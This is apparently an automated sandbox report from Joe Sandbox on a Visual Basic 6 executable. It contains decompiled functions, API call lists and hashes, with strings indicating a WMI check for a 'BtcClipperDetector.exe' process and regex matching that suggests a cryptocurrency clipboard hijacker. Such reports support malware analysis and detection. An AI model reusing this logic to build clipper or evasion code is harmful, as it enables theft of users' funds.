              0x00412d9d
              0x00412da0
              0x00412da1
              0x00412da6
              0x00412da9
              0x00412daa
              0x00412daf
              0x00412db3
              0x00412db4
              0x00412dbc
              0x00412dc1
              0x00412dc7
              0x00412dc8
              0x00412dce
              0x00412dcf
              0x00412dd4
              0x00412dde
              0x00412de1
              0x00412de8
              0x00412de9
              0x00412dee
              0x00412df1
              0x00412df4
              0x00412df5
              0x00412dfa
              0x00412dfd
              0x00412dfe
              0x00412e01
              0x00412e02
              0x00412e0c
              0x00412e14
              0x00412e28
              0x00412e2b
              0x00412e31
              0x00412e32
              0x00412e16
              0x00412e19
              0x00412e1a
              0x00412e20
              0x00412e21
              0x00000000
              0x00412e21
              0x00000000
              0x00412e14
              0x00412e37
              0x00412e3a
              0x00412e3f
              0x00412e6b
              0x00412e73
              0x00412e7b
              0x00412e83
              0x00412e8b
              0x00412e90

              APIs
              • __vbaOnError.MSVBVM60(00000001), ref: 00412CD7
              • __vbaVarDup.MSVBVM60(00000001), ref: 00412CFE
              • #626.MSVBVM60(?,?,0000000A,00000001), ref: 00412D0F
              • __vbaObjVar.MSVBVM60(?,?,?,0000000A,00000001), ref: 00412D18
              • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,0000000A,00000001), ref: 00412D22
              • __vbaFreeVarList.MSVBVM60(00000003,?,0000000A,?,?,00000000,?,?,?,0000000A,00000001), ref: 00412D35
              • __vbaStrCat.MSVBVM60(?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D4E
              • __vbaStrMove.MSVBVM60(?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D58
              • __vbaStrCat.MSVBVM60(00411C60,00000000,?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D63
              • __vbaStrMove.MSVBVM60(00411C60,00000000,?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D6D
              • __vbaFreeStr.MSVBVM60(00411C60,00000000,?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D75
              • __vbaLateMemCallLd.MSVBVM60(?,?,execquery,00000001,?,?,?,?,00000001), ref: 00412DA1
              • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00412DAA
              • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00412DB4
              • __vbaFreeVar.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00412DBC
              • __vbaForEachCollAd.MSVBVM60(?,?,?,?,00000000,00000000), ref: 00412DCF
              • __vbaLateMemCallLd.MSVBVM60(?,?,Name,00000000,?,?,?,?,00000000,00000000), ref: 00412DF5
              • __vbaVarTstEq.MSVBVM60(00008008,00000000,?,?,00000000,00000000), ref: 00412E02
              • __vbaFreeVar.MSVBVM60(00008008,00000000,?,?,00000000,00000000), ref: 00412E0C
              • __vbaNextEachCollAd.MSVBVM60(?,?,00008008,00000000,?,?,00000000,00000000), ref: 00412E21
              • __vbaExitEachColl.MSVBVM60(?,00008008,00000000,?,?,00000000,00000000), ref: 00412E32
              • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,00000000), ref: 00412E3A
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E6B
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E73
              • __vbaFreeStr.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E7B
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E83
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E8B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CollEach$AddrefCallExitLateMove$#626ErrorListNextProc
              • String ID: Name$SELECT * FROM win32_process WHERE Name = '$execquery$winmgmts:
              • API String ID: 2793822420-922686115
              • Opcode ID: 66c29f3985536815d83f7a0eaeea3a33d7769f7eecb11a1713b8ea18cbc03d02
              • Instruction ID: 84cc85d5418cbcc717c3b9c06db5eab627a5667a44a4110c614c832a1513f734
              • Opcode Fuzzy Hash: 66c29f3985536815d83f7a0eaeea3a33d7769f7eecb11a1713b8ea18cbc03d02
              • Instruction Fuzzy Hash: 8251B9B1D00208AAEF10EFE5C885ADEBBB8BF08304F54457EF905B7591DB785A85CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 37%
              			E004134FB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				intOrPtr _v88;
				char _v104;
				signed int _v112;
				char _v120;
				signed int _v136;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v192;
				char* _t76;
				char* _t83;
				char* _t86;
				char* _t87;
				signed int _t120;
				intOrPtr _t123;

				_push(0x401256);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t123;
				_v12 = _t123 - 0xac;
				_v8 = 0x4011c8;
				_push(0);
				_push(L"VBScript.RegExp");
				_push( &_v104);
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				_v156 = 0;
				_v160 = 0;
				_v164 = 0;
				_v168 = 0;
				L004012F2(); // executed
				_push( &_v104);
				_push( &_v52);
				L004013EE();
				L004013E2();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Pattern");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"IgnoreCase");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Global");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = 0;
				_v120 = 2;
				L004013DC();
				_push( &_v192);
				L004013D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t120 = 1;
				_push(_t120);
				_push(L"Execute");
				_push( &_v52);
				_t76 =  &_v104;
				_push(_t76); // executed
				L004013D6(); // executed
				_push(_t76);
				_push( &_v84);
				L004013EE();
				_push( &_v84);
				_push( &_v68);
				_push( &_v156);
				_push( &_v164);
				_push( &_v168);
				_t83 =  &_v160;
				_push(_t83); // executed
				L004013CA(); // executed
				while(1) {
					_v112 = _t120;
					if(_t83 == 0) {
						break;
					}
					_v120 = 2;
					_push( &_v36);
					_push( &_v120);
					_push( &_v104);
					L004013C4();
					L004013DC();
					_push( &_v68);
					_push( &_v156);
					_push( &_v164);
					_push( &_v168);
					_t83 =  &_v160;
					_push(_t83);
					L004013BE();
				}
				_v120 = 0x8002;
				_push( &_v36);
				_push( &_v120);
				_t86 =  &_v104;
				_push(_t86);
				L004013B2();
				_push(_t86);
				L004013B8();
				_v88 = _t86;
				_push(0x413719);
				_t87 =  &_v160;
				_push(_t87);
				L004013AC();
				L0040132E();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				return _t87;
			}

























              0x00413500
              0x0041350b
              0x0041350c
              0x0041351c
              0x0041351f
              0x0041352b
              0x0041352c
              0x00413531
              0x00413532
              0x00413535
              0x00413538
              0x0041353b
              0x0041353e
              0x00413541
              0x00413544
              0x0041354a
              0x00413550
              0x00413556
              0x0041355c
              0x00413562
              0x0041356a
              0x0041356e
              0x0041356f
              0x0041357d
              0x0041358c
              0x0041358d
              0x0041358e
              0x0041358f
              0x00413594
              0x00413595
              0x00413596
              0x0041359b
              0x004135a7
              0x004135b1
              0x004135b2
              0x004135b3
              0x004135b4
              0x004135b9
              0x004135ba
              0x004135bb
              0x004135c0
              0x004135cc
              0x004135d6
              0x004135d7
              0x004135d8
              0x004135d9
              0x004135de
              0x004135df
              0x004135e0
              0x004135eb
              0x004135ee
              0x004135f5
              0x00413603
              0x00413604
              0x00413610
              0x00413611
              0x00413612
              0x00413613
              0x00413619
              0x0041361a
              0x0041361b
              0x00413620
              0x00413621
              0x00413624
              0x00413625
              0x0041362d
              0x00413631
              0x00413632
              0x0041363a
              0x0041363e
              0x00413645
              0x0041364c
              0x00413653
              0x00413654
              0x0041365a
              0x0041365b
              0x00413660
              0x00413662
              0x00413665
              0x00000000
              0x00000000
              0x0041366a
              0x00413671
              0x00413675
              0x00413679
              0x0041367a
              0x00413684
              0x0041368c
              0x00413693
              0x0041369a
              0x004136a1
              0x004136a2
              0x004136a8
              0x004136a9
              0x004136a9
              0x004136b3
              0x004136ba
              0x004136be
              0x004136bf
              0x004136c2
              0x004136c3
              0x004136c8
              0x004136c9
              0x004136ce
              0x004136d1
              0x004136e1
              0x004136e7
              0x004136e8
              0x004136f3
              0x004136fb
              0x00413703
              0x0041370b
              0x00413713
              0x00413718

              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00413562
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041356F
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041357D
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 00413596
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004135BB
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135E0
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135F5
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00413604
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00413625
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00413632
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 0041365B
              • __vbaVarAdd.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 0041367A
              • __vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 00413684
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 004136A9
              • __vbaVarCmpGe.MSVBVM60(?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C3
              • __vbaBoolVar.MSVBVM60(00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C9
              • __vbaAryUnlock.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136E8
              • __vbaFreeObj.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136F3
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136FB
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413703
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 0041370B
              • __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413713
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$Late$EachMoveVarg$#716BoolCallNextNofreeUnlock
              • String ID: Execute$Global$IgnoreCase$Pattern$VBScript.RegExp$ipA
              • API String ID: 2326585221-2387940264
              • Opcode ID: 643d99d1d3b13c533012f1f17018a7637caf4a76c2b1fdb65942cb372b13392d
              • Instruction ID: 44e13f474ac131ec2766a0e247f5d10dce5a9c55b47689a37dba124691be3dba
              • Opcode Fuzzy Hash: 643d99d1d3b13c533012f1f17018a7637caf4a76c2b1fdb65942cb372b13392d
              • Instruction Fuzzy Hash: 4251F8B2C1021CAADB10EFA6CD85EDEB7BCBB09304F50027BE509B7591DB785A498F54
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 50%
              			E00412F1A(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v40;
				char _v44;
				char _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				signed int _v72;
				intOrPtr* _v84;
				void* _t59;
				void* _t61;
				intOrPtr* _t62;
				void* _t63;
				void* _t66;
				intOrPtr* _t67;
				void* _t68;
				void* _t70;
				intOrPtr* _t71;
				void* _t73;
				intOrPtr* _t74;
				signed int _t102;
				signed int _t103;
				intOrPtr* _t106;
				char* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t110;
				void* _t112;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t121;
				intOrPtr _t125;
				intOrPtr _t128;

				_t115 = _t114 - 0x14;
				 *[fs:0x0] = _t115;
				_v24 = _t115 - 0x4c;
				_v20 = 0x401180;
				_t102 = _a4;
				_v16 = _t102 & 0x00000001;
				_t103 = _t102 & 0xfffffffe;
				_a4 = _t103;
				_v12 = 0;
				 *((intOrPtr*)( *_t103 + 4))(_t103, __edi, __esi, __ebx,  *[fs:0x0], 0x401256, _t112);
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v68 = 0;
				_v72 = 0;
				L00401328();
				_t59 =  *((intOrPtr*)( *_t103 + 0x6f8))(_t103,  &_v48,  &_v72);
				if(_t59 < 0) {
					_push(0x6f8);
					_push(0x411ae8);
					_push(_t103);
					_push(_t59);
					L00401322();
				}
				L0040135E();
				if( !_v72 != 0) {
					_push(1);
					L0040138E();
					_t121 =  *0x4193b8; // 0x211e8f4
					if(_t121 == 0) {
						_push(0x4193b8);
						_push(0x411cb4);
						L0040131C();
					}
					_t106 =  *0x4193b8; // 0x211e8f4
					_t61 =  *((intOrPtr*)( *_t106 + 0x1c))(_t106,  &_v52);
					asm("fclex");
					if(_t61 >= 0) {
						_t73 = 0x411ca4;
					} else {
						_push(0x1c);
						_t73 = 0x411ca4;
						_push(0x411ca4);
						_push(_t106);
						_push(_t61);
						L00401322();
					}
					_t62 = _v52;
					_v84 = _t62;
					_v60 = 0x80020004;
					_v68 = 0xa;
					_t107 =  &_v68;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t63 =  *((intOrPtr*)( *_t62 + 0x5c))(_t62,  &_v48);
					asm("fclex");
					if(_t63 < 0) {
						_push(0x5c);
						_push(0x411cc4);
						_push(_v84);
						_push(_t63);
						L00401322();
					}
					_v48 = 0;
					L0040136A();
					L0040132E();
					_t59 = E00416F91(_t73, 0, _t107,  &_v44); // executed
					L0040136A();
					_push(_v40);
					_push(0x411cd8);
					L00401316();
					if(_t59 != 0) {
						_push(0x96);
						E00411A34();
						L00401310();
						_t125 =  *0x4193b8; // 0x211e8f4
						if(_t125 == 0) {
							_push(0x4193b8);
							_push(0x411cb4);
							L0040131C();
						}
						_t108 =  *0x4193b8; // 0x211e8f4
						_t66 =  *((intOrPtr*)( *_t108 + 0x1c))(_t108,  &_v52);
						asm("fclex");
						if(_t66 < 0) {
							_push(0x1c);
							_push(_t73);
							_push(_t108);
							_push(_t66);
							L00401322();
						}
						_t67 = _v52;
						_t109 = _t67;
						_t68 =  *((intOrPtr*)( *_t67 + 0x50))(_t67);
						asm("fclex");
						if(_t68 < 0) {
							_push(0x50);
							_push(0x411cc4);
							_push(_t109);
							_push(_t68);
							L00401322();
						}
						L0040132E();
						_t128 =  *0x4193b8; // 0x211e8f4
						if(_t128 == 0) {
							_push(0x4193b8);
							_push(0x411cb4);
							L0040131C();
						}
						_t110 =  *0x4193b8; // 0x211e8f4
						_t70 =  *((intOrPtr*)( *_t110 + 0x1c))(_t110,  &_v52);
						asm("fclex");
						if(_t70 < 0) {
							_push(0x1c);
							_push(_t73);
							_push(_t110);
							_push(_t70);
							L00401322();
						}
						_t71 = _v52;
						_t74 = _t71;
						_v60 = 0x80020004;
						_v68 = 0xa;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t59 =  *((intOrPtr*)( *_t71 + 0x60))(_t71, _v40);
						asm("fclex");
						if(_t59 < 0) {
							_push(0x60);
							_push(0x411cc4);
							_push(_t74);
							_push(_t59);
							L00401322();
						}
						L0040132E();
					}
				}
				L00401334();
				_push(0x41319c);
				L0040135E();
				L0040135E();
				return _t59;
			}







































              0x00412f1d
              0x00412f2c
              0x00412f39
              0x00412f3c
              0x00412f43
              0x00412f4b
              0x00412f4e
              0x00412f51
              0x00412f56
              0x00412f5c
              0x00412f5f
              0x00412f62
              0x00412f65
              0x00412f68
              0x00412f6b
              0x00412f6e
              0x00412f79
              0x00412f89
              0x00412f91
              0x00412f93
              0x00412f98
              0x00412f9d
              0x00412f9e
              0x00412f9f
              0x00412f9f
              0x00412fac
              0x00412fb4
              0x00412fba
              0x00412fbc
              0x00412fc1
              0x00412fc7
              0x00412fc9
              0x00412fce
              0x00412fd3
              0x00412fd3
              0x00412fd8
              0x00412fe5
              0x00412fe8
              0x00412fec
              0x00412fff
              0x00412fee
              0x00412fee
              0x00412ff0
              0x00412ff5
              0x00412ff6
              0x00412ff7
              0x00412ff8
              0x00412ff8
              0x00413004
              0x00413007
              0x0041300a
              0x00413011
              0x00413021
              0x00413026
              0x00413027
              0x00413028
              0x00413029
              0x0041302b
              0x0041302e
              0x00413034
              0x00413036
              0x00413038
              0x0041303d
              0x00413040
              0x00413041
              0x00413041
              0x00413049
              0x0041304f
              0x00413057
              0x00413060
              0x0041306a
              0x0041306f
              0x00413072
              0x00413077
              0x0041307e
              0x00413084
              0x00413089
              0x0041308e
              0x00413093
              0x00413099
              0x0041309b
              0x004130a0
              0x004130a5
              0x004130a5
              0x004130aa
              0x004130b7
              0x004130ba
              0x004130be
              0x004130c0
              0x004130c2
              0x004130c3
              0x004130c4
              0x004130c5
              0x004130c5
              0x004130ca
              0x004130cd
              0x004130d2
              0x004130d5
              0x004130d9
              0x004130db
              0x004130dd
              0x004130e2
              0x004130e3
              0x004130e4
              0x004130e4
              0x004130ec
              0x004130f1
              0x004130f7
              0x004130f9
              0x004130fe
              0x00413103
              0x00413103
              0x00413108
              0x00413115
              0x00413118
              0x0041311c
              0x0041311e
              0x00413120
              0x00413121
              0x00413122
              0x00413123
              0x00413123
              0x00413128
              0x0041312b
              0x0041312d
              0x00413134
              0x00413145
              0x00413146
              0x00413147
              0x00413148
              0x0041314d
              0x00413150
              0x00413154
              0x00413156
              0x00413158
              0x0041315d
              0x0041315e
              0x0041315f
              0x0041315f
              0x00413167
              0x00413167
              0x0041307e
              0x0041316e
              0x00413173
              0x0041318e
              0x00413196
              0x0041319b

              APIs
              • __vbaStrCopy.MSVBVM60 ref: 00412F79
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AE8,000006F8), ref: 00412F9F
              • __vbaFreeStr.MSVBVM60(00000000,?,00411AE8,000006F8), ref: 00412FAC
              • __vbaOnError.MSVBVM60(00000001), ref: 00412FBC
              • __vbaNew2.MSVBVM60(00411CB4,004193B8,00000001), ref: 00412FD3
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,0000001C), ref: 00412FF8
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411CC4,0000005C), ref: 00413041
              • __vbaStrMove.MSVBVM60(00000000,?,00411CC4,0000005C), ref: 0041304F
              • __vbaFreeObj.MSVBVM60(00000000,?,00411CC4,0000005C), ref: 00413057
              • __vbaStrMove.MSVBVM60(?), ref: 0041306A
              • __vbaStrCmp.MSVBVM60(00411CD8,?,?), ref: 00413077
              • __vbaSetSystemError.MSVBVM60(00000096,00411CD8,?,?), ref: 0041308E
              • __vbaNew2.MSVBVM60(00411CB4,004193B8,00000096,00411CD8,?,?), ref: 004130A5
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,0000001C), ref: 004130C5
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411CC4,00000050), ref: 004130E4
              • __vbaFreeObj.MSVBVM60(00000000,?,00411CC4,00000050), ref: 004130EC
              • __vbaNew2.MSVBVM60(00411CB4,004193B8), ref: 00413103
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,0000001C), ref: 00413123
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411CC4,00000060), ref: 0041315F
              • __vbaFreeObj.MSVBVM60(00000000,?,00411CC4,00000060), ref: 00413167
              • __vbaExitProc.MSVBVM60 ref: 0041316E
              • __vbaFreeStr.MSVBVM60(0041319C), ref: 0041318E
              • __vbaFreeStr.MSVBVM60(0041319C), ref: 00413196
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckHresult$Free$New2$ErrorMove$CopyExitProcSystem
              • String ID: BtcClipperDetector.exe
              • API String ID: 2571865993-3924913259
              • Opcode ID: b51833ed3c854faa6d4b86511cad1051b5816ff5f2f43e430832dbe74d11db7f
              • Instruction ID: f70cad0e261b250c6014bd71156ddb5250e24ff74257a947b8b2519a83c7025b
              • Opcode Fuzzy Hash: b51833ed3c854faa6d4b86511cad1051b5816ff5f2f43e430832dbe74d11db7f
              • Instruction Fuzzy Hash: F2617D71940218AFDB10EFA5CC46EDEBBB8BF58714F24402AF901B72E1DB7859418B69
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 244 40143c-401463 #100
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: #100
              • String ID:
              • API String ID: 1341478452-0
              • Opcode ID: ff19f2bfea4aa134e95db743a2abd2d217d4387ace469c5e3c416849b59bb1c9
              • Instruction ID: 77eea3aa0b90e4eb314ca2f42d8ffcd4982f8529a18642b6e1ff8deb93511ce2
              • Opcode Fuzzy Hash: ff19f2bfea4aa134e95db743a2abd2d217d4387ace469c5e3c416849b59bb1c9
              • Instruction Fuzzy Hash: 1CE0241A18F3C95ED707A7B54C61155BF304E1761071F42DBC195DB0E3C9A8094DCB27
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 583 416a06-416b74 #716 __vbaVarSetVar __vbaVarVargNofree __vbaVarLateMemSt * 3 __vbaVarMove __vbaVargVar __vbaVarLateMemCallLd __vbaVarSetVar __vbaForEachVar 584 416b79-416b7b 583->584 585 416b81-416bbf #617 __vbaVarMove __vbaVarTstEq 584->585 586 416f25-416f7f __vbaAryUnlock __vbaFreeObj __vbaFreeVar * 5 584->586 587 416bc1-416bca 585->587 588 416bcf-416bf0 __vbaVarTstEq 585->588 590 416ea4-416f20 __vbaStrVarVal #712 __vbaStrMove __vbaFreeStr __vbaVarAdd __vbaVarMove __vbaNextEachVar 587->590 591 416c00-416c21 __vbaVarTstEq 588->591 592 416bf2-416bfb 588->592 590->584 593 416c31-416c52 __vbaVarTstEq 591->593 594 416c23-416c2c 591->594 592->590 595 416c58-416c79 __vbaVarTstEq 593->595 596 416e9b-416e9f 593->596 594->590 597 416c89-416caa __vbaVarTstEq 595->597 598 416c7b-416c84 595->598 596->590 599 416cba-416cdb __vbaVarTstEq 597->599 600 416cac-416cb5 597->600 598->590 601 416ceb-416d0c __vbaVarTstEq 599->601 602 416cdd-416ce6 599->602 600->590 603 416d1c-416d3d __vbaVarTstEq 601->603 604 416d0e-416d17 601->604 602->590 605 416d4d-416d6e __vbaVarTstEq 603->605 606 416d3f-416d48 603->606 604->590 607 416d70-416d79 605->607 608 416d7e-416d9f __vbaVarTstEq 605->608 606->590 607->590 609 416da1-416daa 608->609 610 416daf-416dd0 __vbaVarTstEq 608->610 609->590 611 416de0-416e01 __vbaVarTstEq 610->611 612 416dd2-416ddb 610->612 613 416e11-416e32 __vbaVarTstEq 611->613 614 416e03-416e0c 611->614 612->590 615 416e34-416e3d 613->615 616 416e3f-416e60 __vbaVarTstEq 613->616 614->590 615->590 617 416e62-416e6b 616->617 618 416e6d-416e8e __vbaVarTstEq 616->618 617->590 618->596 619 416e90-416e99 618->619 619->590
              C-Code - Quality: 34%
              			E00416A06(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char _v104;
				signed int _v112;
				char _v120;
				signed int _v136;
				char _v156;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v208;
				char* _t145;
				char* _t152;
				char* _t153;
				char* _t157;
				char* _t159;
				char* _t161;
				char* _t163;
				char* _t165;
				char* _t174;
				char* _t176;
				char* _t178;
				char* _t180;
				char* _t182;
				char* _t184;
				char* _t186;
				char* _t188;
				char* _t190;
				char* _t192;
				char* _t194;
				char* _t196;
				signed int _t223;
				intOrPtr _t232;

				_push(0x401256);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t232;
				_v12 = _t232 - 0xbc;
				_v8 = 0x401228;
				_push(0);
				_push(L"VBScript.RegExp");
				_push( &_v104);
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				_v156 = 0;
				_v172 = 0;
				_v176 = 0;
				_v180 = 0;
				_v184 = 0;
				L004012F2();
				_push( &_v104);
				_push( &_v52);
				L004013EE();
				L004013E2();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Pattern");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"IgnoreCase");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Global");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = 0;
				_v120 = 2;
				L004013DC();
				_push( &_v208);
				L004013D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t223 = 1;
				_push(_t223);
				_push(L"Execute");
				_push( &_v52);
				_t145 =  &_v104;
				_push(_t145);
				L004013D6();
				_push(_t145);
				_push( &_v84);
				L004013EE();
				_push( &_v84);
				_push( &_v68);
				_push( &_v156);
				_push( &_v180);
				_push( &_v184);
				_t152 =  &_v176;
				_push(_t152);
				L004013CA();
				while(_t152 != 0) {
					_push(2);
					_push( &_v68);
					_push( &_v104);
					L004013A6();
					L004013DC();
					_v112 = 0x412674;
					_push( &_v172);
					_t157 =  &_v120;
					_push(_t157);
					_v120 = 0x8008;
					L00401346();
					if(_t157 == 0) {
						_v112 = 0x412680;
						_push( &_v172);
						_t159 =  &_v120;
						_push(_t159);
						_v120 = 0x8008;
						L00401346();
						if(_t159 == 0) {
							_v112 = 0x41268c;
							_push( &_v172);
							_t161 =  &_v120;
							_push(_t161);
							_v120 = 0x8008;
							L00401346();
							if(_t161 == 0) {
								_v112 = 0x412698;
								_push( &_v172);
								_t163 =  &_v120;
								_push(_t163);
								_v120 = 0x8008;
								L00401346();
								if(_t163 != 0) {
									L33:
									_push(0);
									_push(0xffffffff);
									_push(_t223);
